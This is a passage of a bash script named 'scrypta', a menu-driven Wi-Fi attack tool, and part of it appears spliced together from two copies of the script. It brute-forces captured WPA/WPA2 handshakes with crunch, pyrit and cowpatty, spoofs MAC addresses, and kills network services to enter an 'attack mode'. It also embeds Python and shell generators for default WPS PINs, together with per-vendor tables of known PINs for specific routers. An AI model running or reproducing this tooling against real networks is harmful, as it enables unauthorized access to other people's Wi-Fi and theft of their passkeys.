  1340. echo "#$STAND           Attack a Capture file without using a wordlist file            $RED#"
  1341. echo "#$STAND                             (Crunch + Pyrit)                             $RED#"
  1342. echo "#                                                                          #"
  1343. echo "############################################################################"$STAND
  1344. echo
  1345. echo $RED"eg: abcdef23456789"
  1346. read -p $GREEN"Input the characters, digits, or symbols to be used$STAND: " CharacterSet
  1347. echo
  1348. echo $RED"eg: 10"
  1349. read -p $GREEN"Input the minimum length of the passwords$STAND: " PasswordLengthMin
  1350. echo
  1351. echo $RED"eg: 10"
  1352. read -p $GREEN"Input the maximum length of the passwords$STAND: " PasswordLengthMax
  1353. echo
  1354. echo $RED"eg:"
  1355. echo $RED"-d <Number> = Limits the amount of times a character, digit, or symbol can appear next to its self."
  1356. echo $RED"-s XXXXXXXXXX = Start point."
  1357. read -p $GREEN"Input any other optional crunch commands?$STAND: " OptionalCrunchOptions
  1358. echo
  1359. echo $RED"eg: sky12345"
  1360. read -p $GREEN"Access Point essid$STAND: " essid
  1361. echo
  1362. echo $RED"eg: /root/Desktop/sky12345.cap"
  1363. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
  1364. clear
  1365. # Chosen user input options
  1366. ############################
  1367. echo
  1368. echo $RED"You've chosen:"
  1369. echo "=============="
  1370. echo $RED"Minimum length password$STAND: $PasswordLengthMin"
  1371. echo $RED"Maximum length of password$STAND: $PasswordLengthMax"
  1372. echo $RED"Characters, digits, symbols to be used in the passwords$STAND: $CharacterSet"
  1373. echo $RED"Other crunch commands?$STAND: $OptionalCrunchOptions"
  1374. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
  1375. echo $RED"essid$STAND: $essid"
  1376. echo
  1377. echo $RED"Commands to launch:"
  1378. echo "==================="
  1379. echo $STAND"crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -r $CapNameLocation -i - attack_passthrough"
  1380. echo
  1381. # Launch chosen commands/options
  1382. #################################
  1383. read -p $GREEN"Press enter to start"$STAND
  1384. clear
  1385. crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -r $CapNameLocation -i - attack_passthrough
  1386.                  fi
  1387.                  if [[ $option == "6" ]]; then
  1388.                                   clear
  1389. echo $RED
  1390. echo "############################################################################"
  1391. echo "#                                                                          #"
  1392. echo "#$STAND           Attack a Capture file without using a wordlist file            $RED#"
  1393. echo "#$STAND                       (Crunch + Pyrit + Cowpatty)                        $RED#"
  1394. echo "#                                                                          #"
  1395. echo "############################################################################"$STAND
  1396. echo
  1397. echo $RED"eg: abcdef23456789"
  1398. read -p $GREEN"Input the characters, digits, or symbols to be used$STAND: " CharacterSet
  1399. echo
  1400. echo $RED"eg: 10"
  1401. read -p $GREEN"Input the minimum length of the passwords$STAND: " PasswordLengthMin
  1402. echo
  1403. echo $RED"eg: 10"
  1404. read -p $GREEN"Input the maximum length of the passwords$STAND: " PasswordLengthMax
  1405. echo
  1406. echo $RED"eg:"
  1407. echo $RED"-d <Number> = Limits the amount of times a character, digit, or symbol can appear next to its self."
  1408. echo $RED"-s XXXXXXXXXX = Start point."
  1409. read -p $GREEN"Input any other optional crunch commands?$STAND: " OptionalCrunchOptions
  1410. echo
  1411. echo $RED"eg: sky12345"
  1412. read -p $GREEN"Access Point essid$STAND: " essid
  1413. echo
  1414. echo $RED"eg: /root/Desktop/sky12345.cap"
  1415. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
  1416. clear
  1417. # Chosen user input options
  1418. ############################
  1419. echo
  1420. echo $RED"You've chosen:"
  1421. echo "=============="
  1422. echo $RED"Minimum length password$STAND: $PasswordLengthMin"
  1423. echo $RED"Maximum length of password$STAND: $PasswordLengthMax"
  1424. echo $RED"Characters, digits, symbols to be used in the passwords$STAND: $CharacterSet"
  1425. echo $RED"Other crunch commands?$STAND: $OptionalCrunchOptions"
  1426. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
  1427. echo $RED"essid$STAND: $essid"
  1428. echo
  1429. echo $RED"Commands to launch:"
  1430. echo "==================="
  1431. echo $STAND"crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid"
  1432. echo
  1433. # Launch chosen commands/options
  1434. #################################
  1435. read -p $GREEN"Press enter to start"$STAND
  1436. clear
  1437. crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid
  1438. fi
  1439. ;;
  1440. 7)
  1441. ###########################
  1442. # Show Recovered Passkeys #
  1443. ###########################
  1444. gnome-open $HOME/scrypta/Recovered-WPA-Passkeys.txt
  1445.  ;;
  1446. 8)
  1447. ##############################################################################
  1448. # Check In Recovered-WPA-Passkeys.txt To See If You Already Have The Passkey #
  1449. ##############################################################################
  1450. ###################
  1451. # Passkey Checker #
  1452. ###################
  1453. clear
  1454. echo $RED"How would you like to search."
  1455. echo $GREEN"[1]$BLUE = Search using the bssid."
  1456. echo $GREEN"[2]$BLUE = Search using the essid."
  1457. echo $GREEN"[0]$BLUE = Return To Previous Menu."
  1458. echo $GREEN"1, 2 or 0?"$STAND
  1459. read option
  1460.  
  1461. if [[ $option == "1" ]]; then
  1462. while true
  1463. do
  1464.    echo -n $GREEN"Please input the bssid of the access point you would like to check for?$STAND: "
  1465.    read -e SEARCHbssid
  1466.    grep -B 1 -A 2 $SEARCHbssid $HOME/scrypta/Recovered-WPA-Passkeys.txt
  1467.    echo
  1468. echo -n "Would you like to search again? (y or n): "
  1469. read -e CONFIRM
  1470. case $CONFIRM in
  1471. n|N|NO|no|No)
  1472. break ;;
  1473. *) echo ""
  1474. esac
  1475. done
  1476. fi
  1477. if [[ $option == "2" ]]; then
  1478. while true
  1479. do
  1480.    echo -n $GREEN"Please input the essid of the access point you would like to check for?$STAND: "
  1481.    read -e SEARCHessid
  1482.    grep -A 3 $SEARCHessid $HOME/scrypta/Recovered-WPA-Passkeys.txt
  1483.    echo
  1484. echo -n "Would you like to search again? (y or n): "
  1485. read -e CONFIRM
  1486. case $CONFIRM in
  1487. n|N|NO|no|No)
  1488. break ;;
  1489. *) echo ""
  1490. esac
  1491. done
  1492. fi
  1493. if [[ $option == "0" ]]; then
  1494. echo "Returning To Menu"
  1495. fi
  1496.  ;;
  1497. 0) exit 0;;
  1498. *) echo "You've chosen an invalid option, please choose again";
  1499. echo "Press [Enter] to continue. . ." ; read ;;
  1500. esac
  1501. done#!/bin/bash
  1502.  
  1503.  
  1504.  
  1505. RED=$(tput setaf 1 && tput bold)
  1506. GREEN=$(tput setaf 2 && tput bold)
  1507. STAND=$(tput sgr0)
  1508. BLUE=$(tput setaf 6 && tput bold)
  1509.  
  1510. while :
  1511. do
  1512.  
  1513. ###### Create scrypta storage folder if it doeasn't exist ######
  1514.  
  1515. if [ -d $HOME/scrypta ];
  1516. then
  1517.    echo ""
  1518. else
  1519.    mkdir $HOME/scrypta
  1520.    mkdir $HOME/scrypta/temp
  1521.    mkdir $HOME/scrypta/Captured_Handshakes
  1522.    mkdir $HOME/scrypta/Client_Scans
  1523. fi
  1524.  
  1525. ###### Delete Missed Files In The Temp Directory ######
  1526.  
  1527.    rm $HOME/scrypta/temp/*.txt &> /dev/null
  1528.    rm $HOME/scrypta/temp/*.py &> /dev/null
  1529.    rm $HOME/scrypta/temp/*.ivs &> /dev/null
  1530.    rm $HOME/scrypta/temp/*.cap &> /dev/null
  1531.    rm $HOME/scrypta/temp/*.xor &> /dev/null
  1532.    rm $HOME/scrypta/temp/*.csv &> /dev/null
  1533.    rm $HOME/scrypta/temp/*.netxml &> /dev/null
  1534.    rm $HOME/scrypta/temp/arp-packet &> /dev/null
  1535.    rm $HOME/scrypta/temp/*.sh &> /dev/null
  1536.  
  1537. ###### START OF: DETECT mon0 MAC ADDRESS AND THEN DISPLAY SYSTEM MODE STATUS ######
  1538.  
  1539. mon0mac=$(ip addr | grep "radiotap" | cut -c 30-46)
  1540.  
  1541. if [ -s $mon0mac ]
  1542. then
  1543.    MonitorModeStatus=$(echo Networking Mode Enabled)
  1544. else
  1545.    MonitorModeStatus=$(echo Attack Mode Enabled)
  1546. fi
  1547.  
  1548. ###### System Environment Options Menu ######
  1549. clear
  1550. echo $RED"#########################################"
  1551. echo "#   $STAND          scrypta             $RED#"
  1552. echo "#########################################"
  1553. echo "#                                       #"
  1554. echo "#$GREEN [1]$BLUE WiFi Adapter Selection            $RED#"
  1555. echo "#$GREEN [2]$BLUE Enable Attack Or Networking Mode  $RED#"
  1556. echo "#$GREEN [3]$BLUE Attack A WPS Enabled Access Point $RED#"
  1557. echo "#$GREEN [4]$BLUE Capture WPA/WPA2 Handshake        $RED#"
  1558. echo "#$GREEN [5]$BLUE WEP Attacks                       $RED#"
  1559. echo "#$GREEN [6]$BLUE Attack Handshake.cap Files        $RED#"
  1560. echo "#$GREEN [7]$BLUE Show Recovered Passkeys           $RED#"
  1561. echo "#$GREEN [8]$BLUE Recovered Passkey Checker         $RED#"
  1562. echo "#                                       #"
  1563. echo "#########################################"
  1564. echo ""
  1565. echo "Chosen Interface$STAND: $wlanX"
  1566. echo $RED"System Mode$STAND: $MonitorModeStatus"
  1567. echo $RED"MAC address for mon0$STAND: $mon0mac"
  1568. echo ""
  1569. read -s -n1 -p $GREEN"Please choose an option?$STAND: " ChosenOption
  1570. echo
  1571. case $ChosenOption in
  1572.  
  1573. 1)
  1574. ###### [1] START OF: CHOOSE A WIFI ADAPTER ######
  1575.  
  1576. cd $HOME/scrypta/temp
  1577. clear
  1578. Presented_WiFi_Adapters=$(airmon-ng | grep "wlan" | cut -c 1-5 | nl -ba -w 1  -s ": ")
  1579. clear
  1580. echo $RED"Available WiFi Adapters.$STAND"
  1581. echo ""
  1582. echo "$Presented_WiFi_Adapters"
  1583. echo ""
  1584. read -s -n1 -p $GREEN"Please input the number of your chosen WiFi adapter:$STAND " grep_Line_Number
  1585. wlanX=$(echo $Presented_WiFi_Adapters | sed -n ""$grep_Line_Number"p" | cut -c 4-8)
  1586. echo ""
  1587. echo ""
  1588. echo $RED"You've chosen:$STAND $wlanX"
  1589. sleep 1
  1590. cd
  1591.  
  1592. ;;
  1593.  
  1594. ###### [1] END OF: CHOOSE A WIFI ADAPTER ######
  1595.  
  1596. 2)
  1597. ###### [2] START OF: ENABLE NETWORKING OR ATTACK MODE ######
  1598.  
  1599. clear
  1600. echo $RED"#########################################"
  1601. echo "#                                       #"
  1602. echo "# $GREEN[1]$BLUE Enable Networking Mode           $RED #"
  1603. echo "# $GREEN[2]$BLUE Enable Attack Mode               $RED #"
  1604. echo "# $GREEN[0]$BLUE Return To Main Menu              $RED #"
  1605. echo "#                                       #"
  1606. echo "#########################################$STAND"
  1607. echo ""
  1608. read -s -n1 -p $GREEN"Choose an option, 1 or 2?:$STAND " option
  1609. if [[ $option == "1" ]]; then
  1610.    clear
  1611.    echo $RED"Putting the system into networking mode$STAND"
  1612.    airmon-ng stop mon5 > /dev/null
  1613.    airmon-ng stop mon4 > /dev/null
  1614.    airmon-ng stop mon3 > /dev/null
  1615.    airmon-ng stop mon2 > /dev/null
  1616.    airmon-ng stop mon1 > /dev/null
  1617.    airmon-ng stop mon0 > /dev/null
  1618.    airmon-ng stop wlanX
  1619.    echo $RED"Please wait...$STAND"
  1620.    ifconfig $wlanX down
  1621.    ifconfig $wlanX down
  1622.    wlanFakeMAC=$(macchanger -r $wlanX | grep "New" | cut -c 16-32)
  1623.    ifconfig $wlanX hw ether $wlanFakeMAC
  1624.    ifconfig $wlanX up
  1625.    sleep 1
  1626.    service network-manager start
  1627.    echo ""
  1628.    echo $RED"Networking mode should now be enabled, A fake MAC address has also been set.$STAND"
  1629.    sleep 3
  1630.    fi
  1631.  
  1632. if [[ $option == "2" ]]; then
  1633.    clear
  1634.    echo $RED"Putting the system into attack mode$STAND"
  1635.    echo $RED"Please wait...$STAND"
  1636.    echo ""
  1637.    airmon-ng stop mon5 > /dev/null
  1638.    airmon-ng stop mon4 > /dev/null
  1639.    airmon-ng stop mon3 > /dev/null
  1640.    airmon-ng stop mon2 > /dev/null
  1641.    airmon-ng stop mon1 > /dev/null
  1642.    airmon-ng stop mon0 > /dev/null
  1643.    ifconfig $wlanX down
  1644.  
  1645. read -s -n1 -p $GREEN"Would you like to disable processes that might cause issue's Y/n?.$STAND " KillProcesses
  1646. if [[ $KillProcesses == "Y" || $KillProcesses == "y" ]]; then
  1647.    echo ""
  1648.    echo $RED"Please wait...$STAND"
  1649.    kill `pidof NetworkManager`
  1650.    sleep 2
  1651.    kill `pidof wpa_supplicant`
  1652.    sleep 2                
  1653. fi
  1654.  
  1655.    ifconfig $wlanX up
  1656.    sleep 1
  1657.    airmon-ng start $wlanX
  1658.    echo $RED"Please wait...$STAND"
  1659.    sleep 1
  1660.    ifconfig $wlanX down
  1661.    sleep 1
  1662.    ifconfig mon0 down
  1663.    wlanMAC1=$(macchanger -r $wlanX | grep "New" | cut -c 16-32)
  1664.    ifconfig $wlanX hw ether $wlanMAC1
  1665.    echo ""
  1666.    sleep 1
  1667.    macchanger --mac $wlanMAC1 mon0 > /dev/null
  1668.    ifconfig $wlanX up
  1669.    ifconfig mon0 up
  1670.    echo ""
  1671.    echo $RED"MAC address for $wlanX:$STAND"
  1672.    macchanger -s $wlanX
  1673.    echo ""
  1674.    echo $RED"MAC address for mon0:$STAND"
  1675.    macchanger -s mon0
  1676.    echo ""
  1677.    echo $RED"A Random MAC address has been set,$STAND "$wlanX"$RED and$STAND mon0$RED should now have the same fake MAC address.$STAND"
  1678.    echo ""
  1679.    echo $RED"Attack Mode Should Now Be Enabled.$STAND"
  1680.    sleep 3
  1681. fi
  1682.  
  1683. ;;
  1684.  
  1685. ###### [2] END OF: ENABLE NETWORKING OR ATTACK MODE ######
  1686.  
  1687. 3)
  1688. ###### [3] Attack A WPS Enabled Access Point ######
  1689. cd $HOME/scrypta/temp
  1690. clear
  1691. ############## Start Of Create WPSpin.py And easybox_wps.py ##############
  1692.  
  1693. ############## WPSpin.py ##############
  1694. echo '
  1695. import sys
  1696.  
  1697. VERSION    = 1
  1698. SUBVERSION = 0
  1699.  
  1700. def usage():
  1701.     print "[+] WPSpin %d.%d " % (VERSION, SUBVERSION)
  1702.     print "[*] Usage : python WPSpin.py 123456"
  1703.     sys.exit(0)
  1704.  
  1705. def wps_pin_checksum(pin):
  1706.     accum = 0
  1707.  
  1708.     while(pin):
  1709.         accum += 3 * (pin % 10)
  1710.         pin /= 10
  1711.         accum += pin % 10
  1712.         pin /= 10
  1713.     return  (10 - accum % 10) % 10
  1714.  
  1715. try:
  1716.     if (len(sys.argv[1]) == 6):
  1717.         p = int(sys.argv[1] , 16) % 10000000
  1718.         print "[+] WPS pin might be : %07d%d" % (p, wps_pin_checksum(p))
  1719.     else:
  1720.         usage()
  1721. except Exception:
  1722.     usage()
  1723. ' > WPSpin.py
  1724.  
  1725. ############## easybox_wps.py ##############
  1726.  
  1727. echo '#!/usr/bin/env python
  1728. import sys, re
  1729.  
  1730. def gen_pin (mac_str, sn):
  1731.     mac_int = [int(x, 16) for x in mac_str]
  1732.     sn_int = [0]*5+[int(x) for x in sn[5:]]
  1733.     hpin = [0] * 7
  1734.    
  1735.     k1 = (sn_int[6] + sn_int[7] + mac_int[10] + mac_int[11]) & 0xF
  1736.     k2 = (sn_int[8] + sn_int[9] + mac_int[8] + mac_int[9]) & 0xF
  1737.     hpin[0] = k1 ^ sn_int[9];
  1738.     hpin[1] = k1 ^ sn_int[8];
  1739.     hpin[2] = k2 ^ mac_int[9];
  1740.     hpin[3] = k2 ^ mac_int[10];
  1741.     hpin[4] = mac_int[10] ^ sn_int[9];
  1742.     hpin[5] = mac_int[11] ^ sn_int[8];
  1743.     hpin[6] = k1 ^ sn_int[7];
  1744.     pin = int("%1X%1X%1X%1X%1X%1X%1X" % (hpin[0], hpin[1], hpin[2], hpin[3], hpin[4], hpin[5], hpin[6]), 16) % 10000000
  1745.  
  1746.     # WPS PIN Checksum - for more information see hostapd/wpa_supplicant source (wps_pin_checksum) or
  1747.         # http://download.microsoft.com/download/a/f/7/af7777e5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc    
  1748.     accum = 0
  1749.     t = pin
  1750.     while (t):
  1751.         accum += 3 * (t % 10)
  1752.         t /= 10
  1753.         accum += t % 10
  1754.         t /= 10
  1755.     return "%i%i" % (pin, (10 - accum % 10) % 10)
  1756.  
  1757. def main():
  1758.     if len(sys.argv) != 2:
  1759.         sys.exit("usage: easybox_wps.py [BSSID]\n eg. easybox_wps.py 38:22:9D:11:22:33\n")
  1760.        
  1761.     mac_str = re.sub(r"[^a-fA-F0-9]", "", sys.argv[1])
  1762.     if len(mac_str) != 12:
  1763.         sys.exit("check MAC format!\n")
  1764.        
  1765.     sn = "R----%05i" % int(mac_str[8:12], 16)
  1766.     print "derived serial number:", sn
  1767.     print "SSID: Arcor|EasyBox|Vodafone-%c%c%c%c%c%c" % (mac_str[6], mac_str[7], mac_str[8], mac_str[9], sn[5], sn[9])        
  1768.     print "WPS pin:", gen_pin(mac_str, sn)
  1769.  
  1770. if __name__ == "__main__":
  1771.     main()
  1772. ' > easybox_wps.py
  1773.  
  1774. ############## End Of Create WPSpin.py And easybox_wps.py ##############
  1775.  
  1776. ############## Start Of Target Selection And Pin Generation ##############
  1777.  
  1778. clear
  1779. echo $RED"Scanning for WPS-enabled access points, press Ctrl+c on the wash screen to stop the scan and choose a target."$STAND
  1780. read -p $GREEN"Press [Enter] to launch the scan.$STAND"
  1781. xterm -geometry 111x24+650+0 -l -lf WashScan.txt -e wash -i mon0
  1782. sed -i ''1,6d';'$d'' WashScan.txt
  1783.  
  1784. ############## Start Of Loop Section ##############
  1785.  
  1786. while true
  1787. do
  1788.  
  1789. Presented_APs=$(cat WashScan.txt | awk '{ print $6 }' | nl -ba -w 1  -s ': ' | sed '$d')
  1790. clear
  1791. echo $RED"Available Access Points."$STAND
  1792. echo ""
  1793. echo "$Presented_APs"
  1794. echo ""
  1795. read -p $GREEN"Please input the number of your chosen target:$STAND " grep_AP_line_number
  1796.  
  1797. Chosen_AP_Line=$(cat WashScan.txt | sed -n ""$grep_AP_line_number"p")
  1798. AP_essid=$(echo $Chosen_AP_Line | awk '{ print $6 }' | sed 's/^[ \t]*//;s/[ \t]*$//')
  1799. AP_bssid=$(echo $Chosen_AP_Line | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//')
  1800. AP_channel=$(echo $Chosen_AP_Line | awk '{ print $2 }' | sed 's/^[ \t]*//;s/[ \t]*$//')
  1801. PinMAC1=$(echo $AP_bssid | sed 's/://g' | cut -c 7-12)
  1802. PinMAC2=$(echo $AP_bssid | sed 's/://g' | cut -c 1-6)
  1803. WPSpin1=`python WPSpin.py $PinMAC1 | awk '{ print $7 }'`
  1804. WPSpin2=`python WPSpin.py $PinMAC2 | awk '{ print $7 }'`
  1805. easybox=`python easybox_wps.py $AP_bssid | grep "WPS pin" | cut -c 10-17`
  1806.  
  1807. ############## End Of Target Selection And Pin Generation ##############
  1808.  
  1809. ############## Start Of Choose A MAC Address Options ##############
  1810.  
  1811. clear
  1812. echo $RED"Please choose a MAC address option:$STAND"
  1813. echo $GREEN"[1]$BLUE = Auto Set A Random MAC address.$STAND"
  1814. echo $GREEN"[2]$BLUE = Input Any MAC Address You Want To Use.$STAND"
  1815. echo $GREEN"[3]$BLUE = Continue Without Changing The MAC Address.$STAND"
  1816. read -s -n1 -p $GREEN"Please choose 1, 2, or 3?$STAND: " option
  1817.  
  1818. if [[ $option == "1" ]]; then
  1819.    clear
  1820.    echo $RED"Auto Setting A Random MAC Address.$STAND"
  1821.    echo $RED"Please wait..."$STAND
  1822.    ifconfig $wlanX down
  1823.    ifconfig $wlanX down
  1824.    sleep 1
  1825.    ifconfig mon0 down
  1826.    wlanMAC2=`macchanger -r $wlanX | grep "New" | cut -c 16-32`
  1827.    ifconfig $wlanX hw ether $wlanMAC2
  1828.    echo ""
  1829.    sleep 1
  1830.    macchanger --mac $wlanMAC2 mon0
  1831.    ifconfig $wlanX up
  1832.    ifconfig mon0 up
  1833.    echo ""
  1834.    echo $RED"MAC address for$STAND $wlanX:"
  1835.    macchanger -s $wlanX
  1836.    echo ""
  1837.    echo $RED"MAC address for$STAND mon0:"
  1838.    macchanger -s mon0
  1839.    echo ""
  1840.    echo $RED"A Random MAC address has been set,$STAND $wlanX$RED and$STAND mon0$RED should now have the same fake MAC address."
  1841.    echo ""
  1842.    sleep 4
  1843.    fi
  1844.  
  1845. if [[ $option == "2" ]]; then
  1846.    clear
  1847.    echo $RED"Set A User specified MAC Address.$STAND"
  1848.    echo $RED"Please wait..."$STAND
  1849.    ifconfig $wlanX down
  1850.    ifconfig mon0 down
  1851.    echo ""
  1852.    echo $RED"Setting a random MAC address."$STAND
  1853.    macchanger -r $wlanX
  1854.    echo ""
  1855.    read -p $GREEN"Input any mac address you want to use?.$STAND " SpecifiedInterfaceMAC
  1856.    ifconfig $wlanX hw ether $SpecifiedInterfaceMAC
  1857.    macchanger --mac $SpecifiedInterfaceMAC mon0
  1858.    ifconfig $wlanX up
  1859.    ifconfig mon0 up
  1860.    echo ""
  1861.    echo $RED"MAC address for$STAND $wlanX:"$STAND
  1862.    macchanger -s $wlanX
  1863.    echo ""
  1864.    echo $RED"MAC address for$STAND mon0:"$STAND
  1865.    macchanger -s mon0
  1866.    echo ""
  1867.    sleep 2
  1868.    echo $RED"A User specified MAC Address has been set, $wlanX and $monX should now have the same fake MAC address."$STAND
  1869.    echo ""
  1870.    echo $RED"Attack Mode Should Now Be Enabled."$STAND
  1871.    sleep 2
  1872.    fi
  1873.  
  1874. if [[ $option == "3" ]]; then
  1875.    echo ""
  1876. fi
  1877.  
  1878. ############## End Of Choose A MAC Address Options ##############
  1879.  
  1880. ############## Start Of Review Information ##############
  1881.  
  1882. clear
  1883. echo $RED"Review Information."$STAND
  1884. echo ""
  1885. echo $RED"You've chosen$BLUE essid$RED:$STAND $AP_essid"
  1886. echo $RED"You've chosen$BLUE bssid$RED:$STAND $AP_bssid"
  1887. echo $RED"You've chosen$BLUE Channel$RED:$STAND $AP_channel"
  1888. echo ""
  1889. echo $RED"Possible$BLUE WPS Pin1$RED:$STAND $WPSpin1"
  1890. echo $RED"Possible$BLUE WPS Pin2$RED:$STAND $WPSpin2"
  1891. echo $RED"Possible$BLUE easybox Pin$RED:$STAND $easybox"
  1892. ############## Start Of WPSPIN-1.3 Default Pin Generater ##############
  1893.  
  1894. ESSID=$(echo $AP_essid)
  1895. BSSID=$(echo $AP_bssid)
  1896.  
  1897. FUNC_CHECKSUM(){
  1898. ACCUM=0
  1899.  
  1900. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
  1901. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
  1902. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
  1903. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
  1904. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
  1905. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
  1906. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`
  1907.  
  1908. DIGIT=`expr $ACCUM '%' 10`
  1909. CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10`
  1910.  
  1911. PIN=`expr $PIN '+' $CHECKSUM`
  1912. ACCUM=0
  1913.  
  1914. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
  1915. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
  1916. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
  1917. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
  1918. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
  1919. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
  1920. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`
  1921. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1 ')' '%' 10 ')'`
  1922.  
  1923. RESTE=`expr $ACCUM '%' 10`
  1924.  }
  1925.  
  1926. CHECKBSSID=$(echo $BSSID | cut -d ":" -f1,2,3 | tr -d ':')
  1927.  
  1928. FINBSSID=$(echo $BSSID | cut -d ':' -f4-)
  1929.  
  1930. MAC=$(echo $FINBSSID | tr -d ':')
  1931.  
  1932. CONVERTEDMAC=$(printf '%d\n' 0x$MAC)
  1933.  
  1934. FINESSID=$(echo $ESSID | cut -d '-' -f2)
  1935.  
  1936. PAREMAC=$(echo $FINBSSID | cut -d ':' -f1 | tr -d ':')
  1937.  
  1938. CHECKMAC=$(echo $FINBSSID | cut -d ':' -f2- | tr -d ':')
  1939.  
  1940. MACESSID=$(echo $PAREMAC$FINESSID)
  1941.  
  1942. STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'`
  1943.  
  1944. PIN=`expr 10 '*' $STRING`
  1945.  
  1946. FUNC_CHECKSUM
  1947.  
  1948. PINWPS1=$(printf '%08d\n' $PIN)
  1949.  
  1950. STRING2=`expr $STRING '+' 8`
  1951. PIN=`expr 10 '*' $STRING2`
  1952.  
  1953. FUNC_CHECKSUM
  1954.  
  1955. PINWPS2=$(printf '%08d\n' $PIN)
  1956.  
  1957. STRING3=`expr $STRING '+' 14`
  1958. PIN=`expr 10 '*' $STRING3`
  1959.  
  1960. FUNC_CHECKSUM
  1961.  
  1962. PINWPS3=$(printf '%08d\n' $PIN)
  1963.  
  1964. if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]] &&  [[ "$CHECKBSSID" = "04C06F" || "$CHECKBSSID" = "202BC1" || "$CHECKBSSID" = "285FDB" || "$CHECKBSSID" = "80B686" || "$CHECKBSSID" = "84A8E4" || "$CHECKBSSID" = "B4749F" || "$CHECKBSSID" = "BC7670" || "$CHECKBSSID" = "CC96A0" ]] &&  [[ $(printf '%d\n' 0x$CHECKMAC) = `expr $(printf '%d\n' 0x$FINESSID) '+' 7` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 1` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 7` ]];
  1965.  
  1966. then
  1967.  
  1968. CONVERTEDMACESSID=$(printf '%d\n' 0x$MACESSID)
  1969.  
  1970. RAIZ=`expr '(' $CONVERTEDMACESSID '%' 10000000 ')'`
  1971.  
  1972. STRING4=`expr $RAIZ '+' 7`
  1973.  
  1974. PIN=`expr 10 '*' $STRING4`
  1975.  
  1976. FUNC_CHECKSUM
  1977.  
  1978. PINWPS4=$(printf '%08d\n' $PIN)
  1979.  
  1980. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS4  "
  1981. PIN4REAVER=$PINWPS4
  1982. else
  1983. case $CHECKBSSID in
  1984. 04C06F | 202BC1 | 285FDB | 80B686 | 84A8E4 | B4749F | BC7670 | CC96A0)
  1985. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1  
  1986. $RED"Other Possible Pin"$RED:$STAND $PINWPS2  
  1987. $RED"Other Possible Pin"$RED:$STAND $PINWPS3"
  1988. PIN4REAVER=$PINWPS1
  1989. ;;
  1990. 001915)
  1991. echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
  1992. PIN4REAVER=12345670
  1993. ;;
  1994. 404A03)
  1995. echo -e "$RED"Other Possible Pin"$RED:$STAND 11866428"
  1996. PIN4REAVER=11866428
  1997. ;;
  1998. F43E61 | 001FA4)
  1999. echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
  2000. PIN4REAVER=12345670
  2001. ;;
  2002. 001A2B)
  2003. if [[ $ESSID =~ ^WLAN_[[:xdigit:]]{4}[[:blank:]]*$ ]];
  2004. then
  2005. echo -e "$RED"Other Possible Pin"$RED:$STAND 88478760"
  2006. PIN4REAVER=88478760
  2007. else
  2008. echo -e "PIN POSSIBLE... > $PINWPS1"
  2009. PIN4REAVER=$PINWPS1
  2010. fi
  2011. ;;
  2012. 3872C0)
  2013. if [[ $ESSID =~ ^JAZZTEL_[[:xdigit:]]{4}[[:blank:]]*$ ]];
  2014. then
  2015. echo -e "$RED"Other Possible Pin"$RED:$STAND 18836486"
  2016. PIN4REAVER=18836486
  2017. else
  2018. echo -e "PIN POSSIBLE    > $PINWPS1"
  2019. PIN4REAVER=$PINWPS1
  2020. fi
  2021. ;;
  2022. FCF528)
  2023. echo -e "$RED"Other Possible Pin"$RED:$STAND 20329761"
  2024. PIN4REAVER= 20329761
  2025. ;;
  2026. 3039F2)
  2027. echo -e "several possible PINs, ranked in order>  
  2028.  16538061 16702738 18355604 88202907 73767053 43297917"
  2029. PIN4REAVER=16538061
  2030. ;;
  2031. A4526F)
  2032. echo -e "several possible PINs, ranked in order>  
  2033.  16538061 88202907 73767053 16702738 43297917 18355604 "
  2034. PIN4REAVER=16538061
  2035. ;;
